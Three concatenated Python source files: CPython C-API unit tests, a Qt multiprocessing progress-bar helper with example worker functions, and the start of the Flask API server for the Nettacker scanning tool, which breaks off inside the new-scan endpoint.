    def test_pendingcalls_non_threaded(self):
        #again, just using the main thread, likely they will all be dispatched at
        #once.  It is ok to ask for too many, because we loop until we find a slot.
        #the loop can be interrupted to dispatch.
        #there are only 32 dispatch slots, so we go for twice that!
        l = []
        n = 64
        self.pendingcalls_submit(l, n)
        self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
    """Check that subinterpreters get their own copies of key modules."""

    def test_subinterps(self):
        # The subinterpreter pickles the ids of its sys.modules and builtins
        # through a pipe; they must differ from this interpreter's ids.
        import builtins
        r, w = os.pipe()
        code = """if 1:
            import sys, builtins, pickle
            with open({:d}, "wb") as f:
                pickle.dump(id(sys.modules), f)
                pickle.dump(id(builtins), f)
            """.format(w)
        with open(r, "rb") as f:
            ret = support.run_in_subinterp(code)
            self.assertEqual(ret, 0)
            self.assertNotEqual(pickle.load(f), id(sys.modules))
            self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012: regression test for PyArg_ParseTuple argument handling.
class Test6012(unittest.TestCase):
    def test(self):
        self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTests(unittest.TestCase):
    """Drive the Programs/_testembed helper binary to test embedding Python."""

    def setUp(self):
        """Locate the _testembed executable and chdir to the source root.

        The binary lives next to sys.executable on Windows builds, and in
        Programs/ in a POSIX source tree; skip the tests if it is absent.
        """
        here = os.path.abspath(__file__)
        basepath = os.path.dirname(os.path.dirname(os.path.dirname(here)))
        exename = "_testembed"
        if sys.platform.startswith("win"):
            # Debug builds carry a "_d" suffix, mirroring sys.executable.
            ext = ("_d" if "_d" in sys.executable else "") + ".exe"
            exename += ext
            exepath = os.path.dirname(sys.executable)
        else:
            exepath = os.path.join(basepath, "Programs")
        self.test_exe = exe = os.path.join(exepath, exename)
        if not os.path.exists(exe):
            self.skipTest("%r doesn't exist" % exe)
        # This is needed otherwise we get a fatal error:
        # "Py_Initialize: Unable to get the locale encoding
        # LookupError: no codec search functions registered: can't find encoding"
        self.oldcwd = os.getcwd()
        os.chdir(basepath)

    def tearDown(self):
        os.chdir(self.oldcwd)

    def run_embedded_interpreter(self, *args, env=None):
        """Runs a test in the embedded interpreter"""
        cmd = [self.test_exe]
        cmd.extend(args)
        if env is not None and sys.platform == 'win32':
            # Windows requires at least the SYSTEMROOT environment variable to
            # start Python.
            env = env.copy()
            env['SYSTEMROOT'] = os.environ['SYSTEMROOT']
        p = subprocess.Popen(cmd,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             universal_newlines=True,
                             env=env)
        (out, err) = p.communicate()
        self.assertEqual(p.returncode, 0,
                         "bad returncode %d, stderr is %r" %
                         (p.returncode, err))
        return out, err

    def run_repeated_init_and_subinterpreters(self):
        """Generator: parse _testembed's output, yielding one 5-line run per pass."""
        out, err = self.run_embedded_interpreter("repeated_init_and_subinterpreters")
        self.assertEqual(err, "")
        # The output from _testembed looks like this:
        # --- Pass 0 ---
        # interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
        # interp 1 <0x1d4f690>, thread state <0x1d35350>: id(modules) = 139650431165784
        # interp 2 <0x1d5a690>, thread state <0x1d99ed0>: id(modules) = 139650413140368
        # interp 3 <0x1d4f690>, thread state <0x1dc3340>: id(modules) = 139650412862200
        # interp 0 <0x1cf9330>, thread state <0x1cf9700>: id(modules) = 139650431942728
        # --- Pass 1 ---
        # ...
        interp_pat = (r"^interp (\d+) <(0x[\dA-F]+)>, "
                      r"thread state <(0x[\dA-F]+)>: "
                      r"id\(modules\) = ([\d]+)$")
        Interp = namedtuple("Interp", "id interp tstate modules")
        numloops = 0
        current_run = []
        for line in out.splitlines():
            if line == "--- Pass {} ---".format(numloops):
                self.assertEqual(len(current_run), 0)
                if support.verbose:
                    print(line)
                numloops += 1
                continue
            self.assertLess(len(current_run), 5)
            match = re.match(interp_pat, line)
            if match is None:
                # Not an interp line at all; fail with a helpful diff.
                self.assertRegex(line, interp_pat)
            # Parse the line from the loop. The first line is the main
            # interpreter and the 3 afterward are subinterpreters.
            interp = Interp(*match.groups())
            if support.verbose:
                print(interp)
            self.assertTrue(interp.interp)
            self.assertTrue(interp.tstate)
            self.assertTrue(interp.modules)
            current_run.append(interp)
            # The last line in the loop should be the same as the first.
            if len(current_run) == 5:
                main = current_run[0]
                self.assertEqual(interp, main)
                yield current_run
                current_run = []

    def test_subinterps_main(self):
        """The first interpreter of every pass is the main one (id 0)."""
        for run in self.run_repeated_init_and_subinterpreters():
            main = run[0]
            self.assertEqual(main.id, '0')

    def test_subinterps_different_ids(self):
        """Subinterpreter ids increase monotonically from the main id."""
        for run in self.run_repeated_init_and_subinterpreters():
            main, *subs, _ = run
            mainid = int(main.id)
            for i, sub in enumerate(subs):
                self.assertEqual(sub.id, str(mainid + i + 1))

    def test_subinterps_distinct_state(self):
        """Each subinterpreter gets its own interp/tstate/modules objects."""
        for run in self.run_repeated_init_and_subinterpreters():
            main, *subs, _ = run
            if '0x0' in main:
                # XXX Fix on Windows (and other platforms): something
                # is going on with the pointers in Programs/_testembed.c.
                # interp.interp is 0x0 and interp.modules is the same
                # between interpreters.
                raise unittest.SkipTest('platform prints pointers as 0x0')
            for sub in subs:
                # A new subinterpreter may have the same
                # PyInterpreterState pointer as a previous one if
                # the earlier one has already been destroyed. So
                # we compare with the main interpreter. The same
                # applies to tstate.
                self.assertNotEqual(sub.interp, main.interp)
                self.assertNotEqual(sub.tstate, main.tstate)
                self.assertNotEqual(sub.modules, main.modules)

    def test_forced_io_encoding(self):
        # Checks forced configuration of embedded interpreter IO streams
        env = dict(os.environ, PYTHONIOENCODING="utf-8:surrogateescape")
        out, err = self.run_embedded_interpreter("forced_io_encoding", env=env)
        if support.verbose > 1:
            print()
            print(out)
            print(err)
        expected_stream_encoding = "utf-8"
        expected_errors = "surrogateescape"
        expected_output = '\n'.join([
            "--- Use defaults ---",
            "Expected encoding: default",
            "Expected errors: default",
            "stdin: {in_encoding}:{errors}",
            "stdout: {out_encoding}:{errors}",
            "stderr: {out_encoding}:backslashreplace",
            "--- Set errors only ---",
            "Expected encoding: default",
            "Expected errors: ignore",
            "stdin: {in_encoding}:ignore",
            "stdout: {out_encoding}:ignore",
            "stderr: {out_encoding}:backslashreplace",
            "--- Set encoding only ---",
            "Expected encoding: latin-1",
            "Expected errors: default",
            "stdin: latin-1:{errors}",
            "stdout: latin-1:{errors}",
            "stderr: latin-1:backslashreplace",
            "--- Set encoding and errors ---",
            "Expected encoding: latin-1",
            "Expected errors: replace",
            "stdin: latin-1:replace",
            "stdout: latin-1:replace",
            "stderr: latin-1:backslashreplace"])
        expected_output = expected_output.format(
            in_encoding=expected_stream_encoding,
            out_encoding=expected_stream_encoding,
            errors=expected_errors)
        # This is useful if we ever trip over odd platform behaviour
        self.maxDiff = None
        self.assertEqual(out.strip(), expected_output)
class SkipitemTest(unittest.TestCase):
    """Parity checks between getargs.c's convertsimple() and skipitem()."""

    def test_skipitem(self):
        """
        If this test failed, you probably added a new "format unit"
        in Python/getargs.c, but neglected to update our poor friend
        skipitem() in the same file.  (If so, shame on you!)

        With a few exceptions**, this function brute-force tests all
        printable ASCII*** characters (32 to 126 inclusive) as format units,
        checking to see that PyArg_ParseTupleAndKeywords() return consistent
        errors both when the unit is attempted to be used and when it is
        skipped.  If the format unit doesn't exist, we'll get one of two
        specific error messages (one for used, one for skipped); if it does
        exist we *won't* get that error--we'll get either no error or some
        other error.  If we get the specific "does not exist" error for one
        test and not for the other, there's a mismatch, and the test fails.

        ** Some format units have special funny semantics and it would
           be difficult to accommodate them here.  Since these are all
           well-established and properly skipped in skipitem() we can
           get away with not testing them--this test is really intended
           to catch *new* format units.

        *** Python C source files must be ASCII.  Therefore it's impossible
            to have non-ASCII format units.
        """
        empty_tuple = ()
        tuple_1 = (0,)
        dict_b = {'b':1}
        keywords = ["a", "b"]
        for i in range(32, 127):
            c = chr(i)
            # skip parentheses, the error reporting is inconsistent about them
            # skip 'e', it's always a two-character code
            # skip '|' and '$', they don't represent arguments anyway
            if c in '()e|$':
                continue
            # test the format unit when not skipped
            format = c + "i"
            try:
                _testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
                    format, keywords)
                when_not_skipped = False
            except SystemError as e:
                s = "argument 1 (impossible<bad format char>)"
                when_not_skipped = (str(e) == s)
            except TypeError:
                when_not_skipped = False
            # test the format unit when skipped
            optional_format = "|" + format
            try:
                _testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
                    optional_format, keywords)
                when_skipped = False
            except SystemError as e:
                s = "impossible<bad format char>: '{}'".format(format)
                when_skipped = (str(e) == s)
            # Both paths must agree on whether the format unit exists.
            message = ("test_skipitem_parity: "
                "detected mismatch between convertsimple and skipitem "
                "for format unit '{}' ({}), not skipped {}, skipped {}".format(
                    c, i, when_skipped, when_not_skipped))
            self.assertIs(when_skipped, when_not_skipped, message)

    def test_parse_tuple_and_keywords(self):
        # Test handling errors in the parse_tuple_and_keywords helper itself
        self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
                          (), {}, 42, [])
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '', 42)
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '', [''] * 42)
        self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '', [42])

    def test_bad_use(self):
        # Test handling invalid format and keywords in
        # PyArg_ParseTupleAndKeywords()
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1,), {}, '||O', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1, 2), {}, '|O|O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1}, '$$O', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1, 'b': 2}, '$O$O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1}, '$|O', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {'a': 1, 'b': 2}, '$O|O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1,), {}, '|O', ['a', 'b'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (1,), {}, '|OO', ['a'])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '|$O', [''])
        self.assertRaises(SystemError, _testcapi.parse_tuple_and_keywords,
                          (), {}, '|OO', ['a', ''])

    def test_positional_only(self):
        # Empty keyword names mark positional-only parameters.
        parse = _testcapi.parse_tuple_and_keywords
        parse((1, 2, 3), {}, 'OOO', ['', '', 'a'])
        parse((1, 2), {'a': 3}, 'OOO', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
               r'function takes at least 2 positional arguments \(1 given\)'):
            parse((1,), {'a': 3}, 'OOO', ['', '', 'a'])
        parse((1,), {}, 'O|OO', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
               r'function takes at least 1 positional arguments \(0 given\)'):
            parse((), {}, 'O|OO', ['', '', 'a'])
        parse((1, 2), {'a': 3}, 'OO$O', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
               r'function takes exactly 2 positional arguments \(1 given\)'):
            parse((1,), {'a': 3}, 'OO$O', ['', '', 'a'])
        parse((1,), {}, 'O|O$O', ['', '', 'a'])
        with self.assertRaisesRegex(TypeError,
               r'function takes at least 1 positional arguments \(0 given\)'):
            parse((), {}, 'O|O$O', ['', '', 'a'])
        with self.assertRaisesRegex(SystemError, r'Empty parameter name after \$'):
            parse((1,), {}, 'O|$OO', ['', '', 'a'])
        with self.assertRaisesRegex(SystemError, 'Empty keyword'):
            parse((1,), {}, 'O|OO', ['', 'a', ''])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
    """Thread-state C API checks driven via _testcapi._test_thread_state."""

    @support.reap_threads
    def test_thread_state(self):
        # some extra thread-state tests driven via _testcapi
        def target():
            idents = []
            def callback():
                idents.append(threading.get_ident())
            _testcapi._test_thread_state(callback)
            # Presumably keeps extra references to the callback alive while
            # the C side runs — TODO confirm against _testcapi's docs.
            a = b = callback
            time.sleep(1)
            # Check our main thread is in the list exactly 3 times.
            self.assertEqual(idents.count(threading.get_ident()), 3,
                             "Couldn't find main thread correctly in the list")
        # Run once in this thread and once in a fresh thread.
        target()
        t = threading.Thread(target=target)
        t.start()
        t.join()
class Test_testcapi(unittest.TestCase):
    """Run every self-contained test_* callable that _testcapi itself exports."""

    def test__testcapi(self):
        for name in dir(_testcapi):
            if not name.startswith('test_'):
                continue
            with self.subTest("internal", name=name):
                getattr(_testcapi, name)()
class PyMemDebugTests(unittest.TestCase):
    """Check the crash reports produced by the PYTHONMALLOC debug hooks."""
    # Allocator name passed via the PYTHONMALLOC environment variable.
    PYTHONMALLOC = 'debug'
    # '0x04c06e0' or '04C06E0'
    PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'

    def check(self, code):
        """Run *code* in a subprocess expected to die; return its decoded stderr."""
        with support.SuppressCrashReport():
            out = assert_python_failure('-c', code,
                                        PYTHONMALLOC=self.PYTHONMALLOC)
        stderr = out.err
        return stderr.decode('ascii', 'replace')

    def test_buffer_overflow(self):
        out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r"    16 bytes originally requested\n"
                 r"    The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r"    The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
                 r"        at tail\+0: 0x78 \*\*\* OUCH\n"
                 r"        at tail\+1: 0xfb\n"
                 r"        at tail\+2: 0xfb\n"
                 r"        .*\n"
                 r"    The block was made by call #[0-9]+ to debug malloc/realloc.\n"
                 r"    Data at p: cb cb cb .*\n"
                 r"\n"
                 r"Fatal Python error: bad trailing pad byte")
        regex = regex.format(ptr=self.PTR_REGEX)
        regex = re.compile(regex, flags=re.DOTALL)
        self.assertRegex(out, regex)

    def test_api_misuse(self):
        out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
        regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
                 r"    16 bytes originally requested\n"
                 r"    The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
                 r"    The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
                 r"    The block was made by call #[0-9]+ to debug malloc/realloc.\n"
                 r"    Data at p: cb cb cb .*\n"
                 r"\n"
                 r"Fatal Python error: bad ID: Allocated using API 'm', verified using API 'r'\n")
        regex = regex.format(ptr=self.PTR_REGEX)
        self.assertRegex(out, regex)

    @unittest.skipUnless(threading, 'Test requires a GIL (multithreading)')
    def check_malloc_without_gil(self, code):
        """Shared helper: allocating without the GIL must be a fatal error."""
        out = self.check(code)
        expected = ('Fatal Python error: Python memory allocator called '
                    'without holding the GIL')
        self.assertIn(expected, out)

    def test_pymem_malloc_without_gil(self):
        # Debug hooks must raise an error if PyMem_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
        self.check_malloc_without_gil(code)

    def test_pyobject_malloc_without_gil(self):
        # Debug hooks must raise an error if PyObject_Malloc() is called
        # without holding the GIL
        code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
        self.check_malloc_without_gil(code)
class PyMemMallocDebugTests(PyMemDebugTests):
    """Same checks with the raw malloc allocator plus debug hooks."""
    PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(sysconfig.get_config_var('WITH_PYMALLOC') == 1,
                     'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
    """Same checks with the pymalloc allocator plus debug hooks."""
    PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
    # test default allocator of Python compiled in debug mode
    # (empty PYTHONMALLOC leaves the build's default in place)
    PYTHONMALLOC = ''
if __name__ == "__main__":
    # Allow running this test module directly.
    unittest.main()
|
progress_bar.py | # -*- coding: utf-8 -*-
import sys, time
from qtpy import QtCore, QtGui, QtWidgets
from multiprocessing import Process, Queue, cpu_count, Pipe
import os
import numpy as np
__all__ = []  # nothing here is meant for star-imports
tic = time.time()  # module import timestamp; appears unused below — TODO confirm
class ProcessLauncher(QtCore.QThread):
    """Background thread that creates, feeds and starts the worker processes
    for a ProgressBar, emitting human-readable status strings as it goes.
    """
    # Emitted with a status message for the ProgressBar's label.
    status_update = QtCore.Signal(str)

    def __init__(self, parent):
        QtCore.QThread.__init__(self)
        # NOTE: `parent` is the owning ProgressBar, stored as a plain
        # attribute, not passed to QThread as a QObject parent.
        self.parent = parent
        self.nCores = parent.nCores

    def __del__(self):
        # Block until the thread finishes before the QThread is destroyed.
        self.wait()

    def run(self):
        p = self.parent
        nCores = self.nCores
        # Phase 1: build one result/progress/status queue, one pipe and one
        # Process per core, registering them on the parent ProgressBar.
        for i in range(nCores):
            self.status_update.emit('Creating process {}/{}'.format(i + 1, nCores))
            q_result = Queue()
            q_progress = Queue()
            q_status = Queue()
            parent_conn, child_conn = Pipe()
            p.q_results.append(q_result)
            p.q_progress.append(q_progress)
            p.q_status.append(q_status)
            p.pipes.append(parent_conn)
            p.processes.append(Process(target=p.outerfunc, args=(q_result, q_progress, q_status, child_conn, p.args)))
        # Phase 2: start the processes (abort early if Stop was pressed).
        started = [False for i in range(nCores)]
        for i in range(nCores):
            if p.stopPressed:
                break
            self.status_update.emit('Initializing process {}/{}'.format(i + 1, nCores))
            p.processes[i].start()
            started[i] = True
        # Phase 3: ship each worker its data chunk over its pipe.
        for i in range(nCores):
            if started[i]:
                if not p.stopPressed:
                    self.status_update.emit('Sending data to process {}/{}'.format(i + 1, nCores))
                    tic = time.time()
                    p.pipes[i].send(p.data[i])
                    #print('Time it took to send data: {}'.format(time.time()-tic))
        # Phase 4: release workers ('Start') or tell them to quit ('Stop').
        for i in range(nCores):
            if started[i]:
                if not p.stopPressed:
                    self.status_update.emit('Starting process {}/{}'.format(i + 1, nCores))
                    p.q_status[i].put('Start')
                else:
                    p.q_status[i].put('Stop')
            else:  # if the the process was never started
                p.process_finished[i] = True
        self.status_update.emit(p.msg)
class ProgressBar(QtWidgets.QWidget):
    """Progress dialog that fans *data* out to *nCores* worker processes.

    Constructing a ProgressBar launches the workers (via a ProcessLauncher
    thread), shows one QProgressBar per core, and blocks inside __init__
    until every worker finishes or the user presses Stop.  The per-worker
    outputs end up in ``self.results`` — a list with one entry per core,
    or None if the run was stopped / any worker returned None.
    """
    finished_sig = QtCore.Signal()

    def __init__(self, outerfunc, data, args, nCores, msg='Performing Operations', parent=None):
        """outerfunc: worker entry point (see inner_func below for the
        required signature); data: one chunk per core; args: extra tuple
        handed to every worker; nCores: number of worker processes."""
        super(ProgressBar, self).__init__(parent)
        self.outerfunc = outerfunc
        self.data = data
        self.args = args
        self.nCores = nCores
        self.msg = msg
        # GUI
        self.label = QtWidgets.QLabel(msg)
        self.progress_bars = []
        self.button = QtWidgets.QPushButton('Stop')
        self.button.clicked.connect(self.handleButton)
        main_layout = QtWidgets.QGridLayout()
        main_layout.addWidget(self.label, 0, 0)
        main_layout.addWidget(self.button, 0, 1)
        for i in range(nCores):
            bar = QtWidgets.QProgressBar()
            bar.setMinimum(1)
            bar.setMaximum(100)
            main_layout.addWidget(bar, 1 + i, 0)
            self.progress_bars.append(bar)
        self.setLayout(main_layout)
        self.setWindowTitle(msg)
        self.stopPressed = False
        self.show()
        QtWidgets.qApp.processEvents()
        # Inter-process plumbing, filled in by the ProcessLauncher thread.
        self.results = [None for i in range(nCores)]
        self.process_finished = [False for i in range(nCores)]
        self.q_results = []
        self.q_progress = []
        self.q_status = []
        self.pipes = []
        self.processes = []
        self.processLauncher = ProcessLauncher(self)
        self.processLauncher.status_update.connect(self.status_updated)
        self.processLauncher.start()
        # Poll worker queues on a timer instead of blocking the GUI thread.
        self.timer = QtCore.QTimer()
        self.timer.timeout.connect(self.check_if_finished)
        self.timer.start(50)
        self.loop = QtCore.QEventLoop()
        self.finished = False
        self.finished_sig.connect(self.loop.quit)
        self.finished_sig.connect(self.update_finished_status)
        self.loop.exec_()  # This blocks until the "finished" signal is emitted
        # exec_() doesn't always honour loop.quit when running under Spyder;
        # spinning on the flag is the workaround.
        while self.finished is False:
            time.sleep(.01)
            QtWidgets.qApp.processEvents()
        self.close()

    def check_if_finished(self):
        """Timer slot: drain progress/result queues; finish when all done."""
        for i in range(len(self.q_progress)):
            if not self.q_progress[i].empty():
                # Drain to the most recent percent value before displaying.
                while not self.q_progress[i].empty():
                    percent = self.q_progress[i].get()
                self.progress_bars[i].setValue(percent)
            if not self.q_results[i].empty():
                self.progress_bars[i].setValue(100)
                self.results[i] = self.q_results[i].get()
                self.process_finished[i] = True
                self.processes[i].join(1)
        QtWidgets.qApp.processEvents()
        if all(self.process_finished):
            # A None from any worker means the run was aborted.
            if any(r is None for r in self.results):
                self.results = None
            self.timer.timeout.disconnect()
            self.finished_sig.emit()
        if self.stopPressed:
            for i in range(self.nCores):
                self.q_status[i].put('Stop')

    def handleButton(self):
        """Stop-button slot; workers learn of it via the 'Stop' status message."""
        self.stopPressed = True

    def status_updated(self, msg):
        """ProcessLauncher slot: show launcher progress text in the label."""
        self.label.setText(msg)

    def update_finished_status(self):
        self.finished = True

    def clear_memory(self):
        """Best-effort teardown of child widgets and instance attributes.

        NOTE: the original file contained two identical definitions of this
        method back to back; Python silently keeps only the last ``def``,
        so the duplicate was dead code and has been removed.
        """
        for child in self.children():
            child.deleteLater()
        for attr in dir(self):
            try:
                delattr(self, attr)
            except Exception:
                pass
# def closeEvent(self, event):
# for child in self.findChildren(QtGui.QDialog):
# if child is not widget:
# child.deleteLater()
#
# if self.closed:
# print('This window was already closed')
# event.accept()
# else:
# self.closeSignal.emit()
# if hasattr(self,'image'):
# del self.image
# self.imageview.setImage(np.zeros((2,2))) #clear the memory
# self.imageview.close()
# del self.imageview
# g.m.setWindowTitle("flika")
# if g.win==self:
# g.win=None
# if self in g.windows:
# g.windows.remove(self)
# self.closed=True
# event.accept() # let the window close
'''
When using the Progress Bar, you need to write two functions:
1) An outer function that takes an object like a numpy array, breaks it into blocks, and creates the ProgressBar object.
2) An inner function that receives the chunks, performs the processing, and returns the results.
If you are using a progress bar in a plugin, make sure to write it in its own python file, or the threads may crash.
The first function should look something like this:
'''
def outer_func():
    """Example driver: split an array into per-core blocks and run inner_func.

    Returns:
        The merged result array, or None if the user pressed Stop.
    """
    # get original data and arguments that the inner function will receive
    original_data = np.random.random((1000, 200, 200))
    args = (1,)
    # break data into blocks, one per core
    nCores = cpu_count()
    # BUG FIX: np.int was a deprecated alias of the builtin int and was
    # removed in NumPy 1.24; use the builtin directly.
    block_ends = np.linspace(0, len(original_data), nCores + 1).astype(int)
    data_blocks = [original_data[block_ends[i]:block_ends[i + 1]] for i in np.arange(nCores)]  # each process gets one element of this list
    # create the ProgressBar object; its __init__ blocks until all workers finish
    progress = ProgressBar(inner_func, data_blocks, args, nCores, msg='Performing my cool inner function')
    # Once finished, per-worker outputs are in progress.results (a list).
    # If the user pressed Stop, progress.results is None (or contains None).
    if progress.results is None or any(r is None for r in progress.results):
        result = None
    else:
        result = np.concatenate(progress.results, axis=0)
    return result
'''
The inner function will actually do the heavy lifting.
Each process will be running the inner function. Each inner function must
take the same 5 arguments.
'''
def inner_func(q_results, q_progress, q_status, child_conn, args):
    """Worker entry point run inside each process.

    Receives its 3-D data block over *child_conn*, adds ``val`` (the single
    element of *args*) to every element, reports integer percent progress
    on *q_progress*, and puts the result — or None if stopped — on
    *q_results*.
    """
    data = child_conn.recv()  # unfortunately this step takes a long time
    percent = 0  # last percent value reported back to the GUI
    status = q_status.get(True)  # blocks until all processes are launched
    if status == 'Stop':
        q_results.put(None)  # if the user presses stop, return None
        # BUG FIX: previously fell through and performed the whole
        # computation (and queued a second result) despite the Stop.
        return
    # Here is the meat of the inner_func.
    val, = args  # unpack all the variables inside the args tuple
    result = np.zeros(data.shape)
    ii, jj, kk = data.shape
    for i in np.arange(ii):
        for j in np.arange(jj):
            for k in np.arange(kk):
                result[i, j, k] = data[i, j, k] + val
        if not q_status.empty():  # check if the stop button has been pressed
            q_status.get(False)
            q_results.put(None)
            return
        if percent < int(100 * i / ii):
            percent = int(100 * i / ii)
            q_progress.put(percent)
    # finally, when we've finished with our calculation, send back the result
    q_results.put(result)
if __name__ == '__main__':
    # Demo: run the example outer_func under a QApplication.
    app = QtWidgets.QApplication(sys.argv)
    result = outer_func()
    print(result)
|
engine.py | # !/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import time
import random
import os
import string
from flask import Flask
from flask import jsonify
from flask import request as flask_request
from flask import render_template
from flask import abort
from flask import Response
from flask import make_response
from core.alert import write_to_api_console
from core.alert import messages
from core._die import __die_success
from api.api_core import __structure
from api.api_core import __get_value
from api.api_core import root_dir
from api.api_core import get_file
from api.api_core import __mime_types
from api.api_core import __scan_methods
from api.api_core import __profiles
from api.api_core import __graphs
from api.api_core import __languages
from core.load_modules import load_all_method_args
from core.config import _core_config
from core.config_builder import _core_default_config
from core.config_builder import _builder
from api.api_core import __remove_non_api_keys
from api.api_core import __rules
from api.api_core import __api_key_check
from api.__database import __select_results
from api.__database import __get_result
from api.__database import __last_host_logs
from api.__database import __logs_to_report_json
from api.__database import __search_logs
from api.__database import __logs_to_report_html
from api.__start_scan import __scan
from core._time import now
# Flask serves the WebUI assets from <repo>/web/static.
template_dir = os.path.join(os.path.join(
    os.path.dirname(os.path.dirname(__file__)), "web"), "static")
app = Flask(__name__, template_folder=template_dir)
app.config.from_object(__name__)
def __language(app=app):
    """
    find the configured UI language

    Args:
        app: flask app

    Returns:
        the language code as a string
    """
    config = app.config["OWASP_NETTACKER_CONFIG"]
    return config["language"]
@app.errorhandler(400)
def error_400(error):
    """
    handle the 400 HTTP error

    Args:
        error: the flask error

    Returns:
        400 JSON error
    """
    body = __structure(status="error", msg=error.description)
    return jsonify(body), 400
@app.errorhandler(401)
def error_401(error):
    """
    handle the 401 HTTP error

    Args:
        error: the flask error

    Returns:
        401 JSON error
    """
    body = __structure(status="error", msg=error.description)
    return jsonify(body), 401
@app.errorhandler(403)
def error_403(error):
    """
    handle the 403 HTTP error

    Args:
        error: the flask error

    Returns:
        403 JSON error
    """
    body = __structure(status="error", msg=error.description)
    return jsonify(body), 403
@app.errorhandler(404)
def error_404(error):
    """
    handle the 404 HTTP error

    Args:
        error: the flask error

    Returns:
        404 JSON error (localized "not found" message)
    """
    lang = app.config["OWASP_NETTACKER_CONFIG"]["language"]
    body = __structure(status="error", msg=messages(lang, "not_found"))
    return jsonify(body), 404
@app.before_request
def limit_remote_addr():
    """
    check if IP filtering applied and API address is in whitelist

    Returns:
        None if it's in whitelist otherwise abort(403)
    """
    # IP Limitation
    config = app.config["OWASP_NETTACKER_CONFIG"]
    if config["api_client_white_list"]:
        allowed_ips = config["api_client_white_list_ips"]
        if flask_request.remote_addr not in allowed_ips:
            abort(403, messages(__language(), "unauthorized_IP"))
    return
@app.after_request
def access_log(response):
    """
    if access log enabled, write one log line for the finished request

    Args:
        response: the flask response

    Returns:
        the flask response (unmodified)
    """
    if app.config["OWASP_NETTACKER_CONFIG"]["api_access_log"]:
        log_path = app.config["OWASP_NETTACKER_CONFIG"]["api_access_log_filename"]
        # if you need to log POST data, append json.dumps(flask_request.form)
        # to the format below.
        line = "{0} [{1}] {2} \"{3} {4}\" {5} {6}\r\n".format(
            flask_request.remote_addr, now(), flask_request.host,
            flask_request.method, flask_request.full_path,
            flask_request.user_agent, response.status_code)
        # BUG FIX: the file is opened in binary append mode, so the line must
        # be encoded — writing a str to an "ab" handle raises TypeError on
        # Python 3 and silently broke access logging.  A context manager
        # also guarantees the handle is closed if write() fails.
        with open(log_path, "ab") as r_log:
            r_log.write(line.encode("utf-8"))
    return response
@app.route("/", defaults={"path": ""})
@app.route("/<path:path>")
def get_statics(path):
    """
    getting static files and return content mime types

    Args:
        path: path and filename

    Returns:
        file content and content type if file found otherwise abort(404)
    """
    static_types = __mime_types()
    extension = os.path.splitext(path)[1]
    mime = static_types.get(extension, "text/html")
    content = get_file(os.path.join(root_dir(), path))
    return Response(content, mimetype=mime)
@app.route("/", methods=["GET", "POST"])
def index():
    """
    index page for WebUI

    Returns:
        rendered HTML page
    """
    filename = _builder(_core_config(), _core_default_config())["log_in_file"]
    return render_template(
        "index.html",
        scan_method=__scan_methods(),
        profile=__profiles(),
        graphs=__graphs(),
        languages=__languages(),
        filename=filename,
        method_args_list=load_all_method_args(__language(), API=True),
    )
@app.route("/new/scan", methods=["GET", "POST"])
def new_scan():
    """
    new scan through the API

    Returns:
        a JSON message with scan details if success otherwise a JSON error
    """
    __api_key_check(app, flask_request, __language())
    # Collect only the config keys the caller actually supplied.
    _start_scan_config = {}
    for key in _core_default_config():
        value = __get_value(flask_request, key)
        if value is not None:
            _start_scan_config[key] = value
    _start_scan_config["backup_ports"] = __get_value(flask_request, "ports")
    # Merge with defaults, strip API-only keys, then apply the rule checks.
    merged = _builder(_start_scan_config,
                      _builder(_core_config(), _core_default_config()))
    _start_scan_config = __rules(__remove_non_api_keys(merged),
                                 _core_default_config(), __language())
    # Run the scan in a separate process so the request returns immediately.
    multiprocessing.Process(target=__scan, args=[_start_scan_config]).start()
    # Sometimes method_args is too big!
    _start_scan_config["methods_args"] = {
        "as_user_set": "set_successfully"
    }
